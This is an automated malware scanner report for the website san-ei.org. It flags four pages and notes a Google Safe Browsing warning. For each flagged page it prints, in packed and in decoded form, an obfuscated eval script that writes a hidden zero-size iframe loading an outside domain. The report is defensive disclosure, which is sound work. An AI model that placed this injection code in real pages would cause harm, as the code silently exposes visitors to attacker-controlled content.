Malware Scanner report for san-ei.org

Malicious/Suspicious/Total urls checked: 0/4/15

4 pages have suspicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "san-ei.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/0

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=san-ei.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://san-ei.org/	200 OK Content-Length: 5715 Content-Type: text/html	suspicious
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]\|\|c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'\|var\|write\|document\|k02\|k0\|1000\|k22\|k01\|if\|k2\|setTimeout\|src\|http\|\|board\|height\|hotelgpgrand\|width\|com\|\|php\|index\|ram'.split('\|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://hotelgpgrand.com/index.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://hotelgpgrand.com/index.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 / undefined /** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://hotelgpgrand.com/index.php"></ifee>
http://san-ei.org/common/script/heightLine.js	200 OK Content-Length: 4056 Content-Type: application/javascript	clean
http://san-ei.org/common/script/pagetop.js	200 OK Content-Length: 404 Content-Type: application/javascript	clean
http://san-ei.org/common/script/pulldown.js	200 OK Content-Length: 174 Content-Type: application/javascript	clean
http://san-ei.org/common/script/smartRollover.js	200 OK Content-Length: 653 Content-Type: application/javascript	clean
http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js	200 OK Content-Length: 57254 Content-Type: text/javascript	clean
http://san-ei.org/information/index.html	200 OK Content-Length: 3921 Content-Type: text/html	suspicious
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]\|\|c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'\|var\|write\|document\|k02\|k0\|1000\|k22\|k01\|if\|k2\|setTimeout\|src\|http\|\|board\|height\|hotelgpgrand\|width\|com\|\|php\|index\|ram'.split('\|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://hotelgpgrand.com/index.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://hotelgpgrand.com/index.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 / undefined /** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://hotelgpgrand.com/index.php"></ifee>
http://san-ei.org/information/../common/script/heightLine.js	200 OK Content-Length: 4056 Content-Type: application/javascript	clean
http://san-ei.org/information/../common/script/pagetop.js	200 OK Content-Length: 404 Content-Type: application/javascript	clean
http://san-ei.org/information/../common/script/pulldown.js	200 OK Content-Length: 174 Content-Type: application/javascript	clean
http://san-ei.org/information/../common/script/smartRollover.js	200 OK Content-Length: 653 Content-Type: application/javascript	clean
http://san-ei.org/information/../index.html	200 OK Content-Length: 5715 Content-Type: text/html	suspicious
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]\|\|c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'\|var\|write\|document\|k02\|k0\|1000\|k22\|k01\|if\|k2\|setTimeout\|src\|http\|\|board\|height\|hotelgpgrand\|width\|com\|\|php\|index\|ram'.split('\|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://hotelgpgrand.com/index.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://hotelgpgrand.com/index.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 / undefined /** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://hotelgpgrand.com/index.php"></ifee>
http://san-ei.org/information/../information/index.html	200 OK Content-Length: 3921 Content-Type: text/html	suspicious
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]\|\|c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" f=\\"0\\" c=\\"d://h.j/m.l\\">";1 5="<9";1 8="n";1 4="e";1 a="</9";1 7="e>";3.2(5);b(3.2(8+4+k+a),6);b(3.2(4+7),6);',24,24,'\|var\|write\|document\|k02\|k0\|1000\|k22\|k01\|if\|k2\|setTimeout\|src\|http\|\|board\|height\|hotelgpgrand\|width\|com\|\|php\|index\|ram'.split('\|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://hotelgpgrand.com/index.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://hotelgpgrand.com/index.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 / undefined /** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://hotelgpgrand.com/index.php"></ifee>
http://san-ei.org/information/../information/../common/script/heightLine.js	200 OK Content-Length: 4056 Content-Type: application/javascript	clean
http://san-ei.org/information/../information/../common/script/pagetop.js	200 OK Content-Length: 404 Content-Type: application/javascript	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: san-ei.org

Result:
HTTP/1.1 200 OK
Date: Sun, 14 Dec 2014 02:18:12 GMT
Accept-Ranges: bytes
ETag: "12041456a-1653-50a1c55dce14a"
Server: Apache
Content-Length: 5715
Content-Type: text/html
Last-Modified: Sat, 13 Dec 2014 17:28:19 GMT
X-Cnection: close

...5715 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: san-ei.org
Referer: http://www.google.com/search?q=san-ei.org

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for san-ei.org

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools